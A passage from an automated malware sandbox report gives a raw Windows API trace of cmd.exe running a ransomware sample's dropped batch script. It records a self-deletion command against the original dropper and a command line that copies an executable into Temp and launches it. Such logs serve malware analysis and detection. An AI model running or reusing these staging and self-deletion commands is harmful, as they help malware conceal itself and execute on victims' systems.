dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0100.665] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.665] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.665] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.665] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x66, lpOverlapped=0x0) returned 1 [0100.665] SetFilePointer (in: hFile=0x54, lDistanceToMove=72, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0100.665] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=51, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n") returned 51 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.665] GetFileType (hFile=0x54) returned 0x1 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.666] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0100.666] _tell (_FileHandle=3) returned 72 [0100.666] _close (_FileHandle=3) returned 0 [0100.667] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f47c | out: _Buffer="\r\n") returned 2 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.667] GetFileType (hFile=0x7) returned 0x2 [0100.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f43c | out: lpMode=0x18f43c) returned 1 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.667] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f468, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f468*=0x2) returned 1 [0100.667] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0100.667] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.667] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0100.667] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x18f478 | out: _Buffer=">") returned 1 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.667] GetFileType (hFile=0x7) returned 0x2 [0100.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f440 | out: lpMode=0x18f440) returned 1 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18f46c, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x18f46c*=0x19) returned 1 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] GetFileType (hFile=0x7) returned 0x2 [0100.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.668] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6c4 | out: lpMode=0x18f6c4) returned 1 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1d2ea0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x18f6f0, lpReserved=0x0 | out: lpBuffer=0x1d2ea0*, lpNumberOfCharsWritten=0x18f6f0*=0x3) returned 1 [0100.668] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x18f6fc | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" ") returned 47 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] GetFileType (hFile=0x7) returned 0x2 [0100.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.668] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6bc | out: lpMode=0x18f6bc) returned 1 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x18f6e8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f6e8*=0x2f) returned 1 [0100.669] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f71c | out: _Buffer="\r\n") returned 2 [0100.669] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.669] GetFileType (hFile=0x7) returned 0x2 [0100.669] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.669] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6dc | out: lpMode=0x18f6dc) returned 1 [0100.669] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.669] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f708, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f708*=0x2) returned 1 [0100.669] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0100.669] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0100.669] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0100.669] GetConsoleTitleW (in: lpConsoleTitle=0x18f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.670] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18f044 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.671] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18e0d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.671] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e308, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0100.671] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0x20 [0100.671] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1d0d18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.671] SetErrorMode (uMode=0x0) returned 0x0 [0100.671] SetErrorMode (uMode=0x1) returned 0x0 [0100.671] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", nBufferLength=0x104, lpBuffer=0x18e728, lpFilePart=0x18e710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", lpFilePart=0x18e710*="2017-0~1.EXE") returned 0x25 [0100.671] SetErrorMode (uMode=0x0) returned 0x1 [0100.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0x20 [0100.671] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", fInfoLevelId=0x0, lpFindFileData=0x1e1fc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1fc4) returned 0x1d0fe8 [0100.672] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 1 [0100.672] FindNextFileW (in: hFindFile=0x1d0fe8, lpFindFileData=0x1e1fc4 | out: lpFindFileData=0x1e1fc4) returned 0 [0100.672] GetLastError () returned 0x12 [0100.672] FindClose (in: hFindFile=0x1d0fe8 | out: hFindFile=0x1d0fe8) returned 1 [0100.673] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.673] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.673] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.673] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.673] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.673] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.673] SetConsoleInputExeNameW () returned 0x1 [0100.673] GetConsoleOutputCP () returned 0x1b5 [0100.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.673] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.674] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0100.674] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] SetFilePointer (in: hFile=0x54, lDistanceToMove=72, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0100.674] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x33, lpOverlapped=0x0) returned 1 [0100.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=51, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n") returned 51 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] GetFileType (hFile=0x54) returned 0x1 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.675] _tell (_FileHandle=3) returned 123 [0100.675] _close (_FileHandle=3) returned 0 [0100.675] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f47c | out: _Buffer="\r\n") returned 2 [0100.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.675] GetFileType (hFile=0x7) returned 0x2 [0100.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f43c | out: lpMode=0x18f43c) returned 1 [0100.676] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.676] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f468, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f468*=0x2) returned 1 [0100.676] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.676] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0100.676] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x18f478 | out: _Buffer=">") returned 1 [0100.676] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.676] GetFileType (hFile=0x7) returned 0x2 [0100.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f440 | out: lpMode=0x18f440) returned 1 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18f46c, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x18f46c*=0x19) returned 1 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] GetFileType (hFile=0x7) returned 0x2 [0100.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.677] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6c4 | out: lpMode=0x18f6c4) returned 1 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1d2ea0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x18f6f0, lpReserved=0x0 | out: lpBuffer=0x1d2ea0*, lpNumberOfCharsWritten=0x18f6f0*=0x3) returned 1 [0100.677] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x18f6fc | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" ") returned 47 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] GetFileType (hFile=0x7) returned 0x2 [0100.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.677] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6bc | out: lpMode=0x18f6bc) returned 1 [0100.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.678] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x18f6e8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f6e8*=0x2f) returned 1 [0100.678] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f71c | out: _Buffer="\r\n") returned 2 [0100.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.678] GetFileType (hFile=0x7) returned 0x2 [0100.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6dc | out: lpMode=0x18f6dc) returned 1 [0100.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.678] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f708, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f708*=0x2) returned 1 [0100.678] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0100.678] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0100.678] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0100.678] GetConsoleTitleW (in: lpConsoleTitle=0x18f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.678] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18f044 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.678] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18e0d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.678] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e308, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0100.679] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0xffffffff [0100.679] GetLastError () returned 0x2 [0100.679] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1d0d18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.679] SetErrorMode (uMode=0x0) returned 0x0 [0100.679] SetErrorMode (uMode=0x1) returned 0x0 [0100.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", nBufferLength=0x104, lpBuffer=0x18e728, lpFilePart=0x18e710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", lpFilePart=0x18e710*="2017-0~1.EXE") returned 0x25 [0100.679] SetErrorMode (uMode=0x0) returned 0x1 [0100.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0xffffffff [0100.679] GetLastError () returned 0x2 [0100.679] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", fInfoLevelId=0x0, lpFindFileData=0x1dff04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1dff04) returned 0xffffffff [0100.679] GetLastError () returned 0x2 [0100.679] _get_osfhandle (_FileHandle=2) returned 0xb [0100.680] GetFileType (hFile=0xb) returned 0x2 [0100.680] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.680] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ed04 | out: lpMode=0x18ed04) returned 1 [0100.680] _get_osfhandle (_FileHandle=2) returned 0xb [0100.680] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ed38 | out: lpConsoleScreenBufferInfo=0x18ed38) returned 1 [0100.680] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0100.680] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x18ed78 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\r\n") returned 0x36 [0100.680] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x18ed5c, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18ed5c*=0x36) returned 1 [0100.681] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.681] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.681] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.681] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.681] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.681] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.681] SetConsoleInputExeNameW () returned 0x1 [0100.681] GetConsoleOutputCP () returned 0x1b5 [0100.681] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.681] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.681] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0100.682] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=123, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x0, lpOverlapped=0x0) returned 1 [0100.682] GetLastError () returned 0x0 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] GetFileType (hFile=0x54) returned 0x1 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f68c, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f68c*=0x0, lpOverlapped=0x0) returned 1 [0100.682] GetLastError () returned 0x0 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] GetFileType (hFile=0x54) returned 0x1 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.683] longjmp () [0100.683] _tell (_FileHandle=3) returned 123 [0100.683] _close (_FileHandle=3) returned 0 [0100.683] CmdBatNotification () returned 0x0 [0100.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.683] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.683] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.683] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.683] SetConsoleInputExeNameW () returned 0x1 [0100.683] GetConsoleOutputCP () returned 0x1b5 [0100.683] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.683] exit (_Code=0) Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 639 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 640 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 641 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 642 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 643 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 644 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 645 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 646 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 647 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 648 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 697 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 